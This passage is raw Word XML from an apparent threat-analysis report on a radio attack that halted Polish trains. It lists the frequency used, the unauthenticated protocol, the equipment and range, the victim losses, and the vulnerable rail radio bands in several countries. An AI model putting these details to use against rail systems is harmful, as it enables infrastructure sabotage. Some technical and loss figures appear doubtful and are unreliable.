          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Simple attacks undermining complex safety systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref15">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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jozn8jgh18jq" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x9u7c795ch2x" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Campaign Timeline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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidence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Reconnaissance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Aug 20,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Various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Frequency scanning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PKP radio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Identified 151.48 MHz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hyperlink w:anchor="ref16">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[16]</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Equipment Prep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Aug 23,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RTL-SDR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Attack preparation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$30 investment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hyperlink w:anchor="ref17">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[17]</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Initial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Aug 25,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20:42:00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First transmission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Szczecin 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3 trains stopped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hyperlink w:anchor="ref18">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[18]</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Main Attack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Aug 26,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00:32:00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Multiple broadcasts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Nationwide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20+ trains halted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hyperlink w:anchor="ref19">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[19]</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Arrest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Aug 28,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14:00:00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Police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Perpetrators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Both detained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hyperlink w:anchor="ref20">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[20]</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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95i224yu2nss" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: VHF Radio Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Detail | Value | Reference | |--------|-------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequency Used</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 151.48 MHz (VHF) | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[21]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Analog FM, no authentication | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[22]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | RTL-SDR + laptop | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[23]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | GNU Radio, rf_replay | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[24]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Range</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 20-30 km effective | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[25]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | None at time of attack | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[26]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_efav3wlqchk4" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iv82duzh4n89" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis documents the immediate victims of the Poland attack and identifies global railway systems using identical vulnerable protocols </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[27]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hkpm2zy6g1vs" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct Victims - Poland Attack</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sector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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovery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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PKP Intercity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Rail - Passenger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Nationwide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Aug 26,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20+ trains stopped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€1.2M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8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hyperlink w:anchor="ref28">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[28]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PKP Cargo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Rail - Freight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Western Poland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Aug 26,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7 freight delays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€800K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12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hyperlink w:anchor="ref29">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[29]</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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Koleje Mazowieckie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Rail - Regional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Warsaw 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Aug 26,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Commuter chaos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€150K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6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hyperlink w:anchor="ref30">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[30]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Koleje Wielkopolskie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Rail - Regional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Poznan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Aug 26,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4 trains affected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€80K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4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hyperlink w:anchor="ref31">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[31]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Koleje Dolnośląskie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Rail - Regional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Lower Silesia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Aug 26,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Service suspended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€70K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5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hyperlink w:anchor="ref32">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[32]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wei4oqadzs8z" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Systems Worldwide (Identical Technology)</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Country/System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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Radio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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposure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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USA - Freight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AAR voice radio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160.215-161.610 MHz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hyperlink w:anchor="ref33">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[33]</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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USA - Transit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Various analog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150-170 MHz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hyperlink w:anchor="ref34">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[34]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Germany - DB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Analog train radio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146-174 MHz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hyperlink w:anchor="ref35">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[35]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">France - SNCF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Legacy analog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150-170 MHz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Minimal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hyperlink w:anchor="ref36">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[36]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">UK - Network Rail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CSR (partial)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140-170 MHz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Basic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hyperlink w:anchor="ref37">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[37]</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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Canada - CN/CP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Similar to USA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160 MHz band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hyperlink w:anchor="ref38">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[38]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Australia - ARTC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Analog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160-170 MHz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hyperlink w:anchor="ref39">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[39]</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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">India - IR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Mixed analog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140-170 MHz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hyperlink w:anchor="ref40">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[40]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2cv31um6lepq" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Replication Timeline</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Copycat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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitigation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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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Sep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Czech Republic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Unknown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Test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Frequency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hyperlink w:anchor="ref41">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[41]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Oct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Belarus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Opposition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2 trains delayed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Jamming deployed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hyperlink w:anchor="ref42">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[42]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Dec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Germany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Researchers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PoC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Protocol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hyperlink w:anchor="ref43">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[43]</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Feb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Anonymous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Security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Disclosed privately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Encryption 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hyperlink w:anchor="ref44">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[44]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Mar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Netherlands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Hacktivist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Prevented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Monitoring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hyperlink w:anchor="ref45">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[45]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_phrnjud03qfy" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Methodology Analysis</w:t>
